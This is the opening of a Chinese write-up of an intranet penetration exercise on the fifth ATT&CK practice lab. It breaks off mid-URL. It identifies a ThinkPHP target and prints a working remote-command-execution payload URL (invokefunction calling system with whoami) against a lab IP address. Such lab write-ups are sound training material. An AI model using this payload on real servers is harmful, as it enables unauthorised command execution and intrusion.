记一次内网渗透(ATT&CK第五个攻防靶场)
记一次内网渗透(ATT&CK第五个攻防靶场)靶场下载地址:download渗透测试拿到题目打开是一个thinkphp框架测试thinkphp版本找到此版本漏洞的poc 可以命令执行http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami查看当前路径http://192.1







